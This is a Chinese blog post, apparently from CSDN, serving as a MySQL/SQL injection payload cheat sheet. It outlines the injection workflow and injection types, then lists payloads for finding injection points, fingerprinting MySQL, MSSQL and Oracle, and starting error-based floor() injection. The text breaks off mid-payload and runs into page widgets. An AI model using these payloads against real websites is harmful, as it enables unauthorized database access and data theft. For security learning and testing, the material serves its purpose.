MySQL注入--Payload

MySQL注入--Payload

Mirror王宇阳

2019-10-22

SQL的注入流程一般如下:

1、判断是否有SQL注入漏洞(判断注入点)

2、判断 数据库的系统架构、数据库名、web应用类型等

3、获取数据库信息

4、加密信息破解

5、进行提权

前篇

注入漏洞分类:

数字型注入:

当输入(注入)的参数为整数,则可以认为该漏洞注入点为数字型注入;

http://192.168.2.172/index.php/?id=8

在后端中SQL语句构成如下:

select * from user where id=8;
字符型注入:

当输入(注入)的参数为字符/串时可以认定为是字符型注入漏洞

其它注入:

POST注入:注入字段在POST数据中

Cookie注入:注入字段在Cookie数据中

延迟注入:使用数据库延迟特性进行注入

搜索注入:在搜索栏中利用恶意代码进行注入

base64注入:注入字符串经过base64加密

判断注入点

' or 1=1 #

and 1=1 #
and '1'='1' #
1') and ('1=1') #
url/?id=1/1
url/?id=1/0

判断数据库系统类型

PHP搭建的Web应用后端为MySQL

JSP搭建的Web应用后端为Oracle

ASP搭建的Web应用后端为MSSQL

MySQL

字符串连接判断:

?id=1 and '1'+'1' = '11'
?id=1 and concat('1','1')='11'

判断数据库的系统库表:

' and (select count(*) from information_schema.tables)>0 and 1=1

MSSQL

默认变量:

'?; select @@servername--+

字符串连接判断:

?id=1 and '1'+'1'='11'

数据库系统表判断:

' and (select count(*) from sysobjects)>0 and 1=1

Oracle

系统表判断:

' and (select count(*) from sys.user_tables)>0 and 1=1

字符串连接判断:

and '1'||'1' = '11'
and concat('1','1')='11'

MySQL注入姿势payload

报错注入

语句执行后返回异常信息,这些异常信息包含了重要数据

floor报错注入:

floorgroup by配合使用group by的key唯一性和编码顺序导致二次执行产生不同大的key

' and select count(*) from table group by floor(rand(0))*2 #
union select 1,count(*),concat(0x7e,0x7e,(sel
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值